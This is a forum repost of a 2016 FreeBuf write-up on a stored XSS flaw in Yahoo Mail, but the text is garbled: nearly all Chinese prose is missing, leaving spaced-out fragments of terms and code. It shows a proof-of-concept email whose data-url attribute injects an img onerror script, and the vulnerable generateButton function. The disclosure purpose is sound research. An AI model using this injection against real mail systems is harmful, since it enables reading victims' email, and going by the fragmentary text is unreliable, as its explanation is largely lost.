[10820] 2016-12-12_雅虎邮箱存储型XSS漏洞,黑客能看任何人的邮件

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-18
2016-12-12_雅虎邮箱存储型XSS漏洞,黑客能看任何人的邮件 X S S S p h i n x   F r e e B u f   2 0 1 6 - 1 2 - 1 2 K l i k k i   O y J o u k o   P y n n ö n e n X S S H T M L H T M L H T M L 使 H T M L G o o g l e / D r o p b o x d a t a - *   H T M L H T M L d a t a - * J a v a s c r i p t H T M L d a t a - * 使 C h r o m e J a v a S c r i p t d a t a - u r l
Y o u T u b e Y o u t u b e d a t a - * < I F R A M E > J S d a t a - * d a t a - * d a t a - u r l H T M L U R L Y o u t u b e d a t a - u r l i n n e r H T M L   d i v J a v a S c r i p t 使 d a t a - u r l H T M L H T M L o n e r r o r < I M G > F r o m :   < a t t a c k e r @ a t t a c k e r . c o m > S u b j e c t :   h e l l o T o :   v i c t i m @ y a h o o . c o m M I M E - V e r s i o n :   1 . 0 C o n t e n t - t y p e :   t e x t / h t m l < d i v   c l a s s = " y a h o o - l i n k - e n h a n c r - c a r d "   d a t a - u r l = " h t t p s : / / w w w . y o u t u b e . c o m / a a a & q u o t ; & g t ; & l t ; i m g   s r c = x   o n e r r o r = a l e r t ( / x s s / ) & g t ; & l t ; " > < d i v   c l a s s = " c a r d - s h a r e - c o n t a i n e r " > < a   c l a s s = " e n h a n c r - p l a y - b t n " > < / a > < / d i v > < / d i v >
t . s h a r e M e n u . g e n e r a t e B u t t o n ( r . c a r d U r l , s ) d a t a - u r l H T M L X S S 使 A J A X 1 1 1 2 H a c k e r O n e 1 1 2 9 1 * k l i k k i S p h i n x F r e e B u f F r e e B u f . c o m f u n c t i o n   g e n e r a t e B u t t o n ( e , t )   {       v a r   n = t h i s , r ;       t . i n s e r t ( [ ' < b u t t o n   d a t a - s h a r e - u r l = " ' , e , ' "   c l a s s = " ' , o , ' " >                                         < s p a n   c l a s s = " i c o n   i c o n - s o c i a l " > < / s p a n >                                         < / b u t t o n > ' ] . j o i n ( " " ) ) ;       r = t . o n e ( " . " + o ) ;       n . _ a t t a c h B u t t o n L i s t e n e r s ( r ) ; }

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则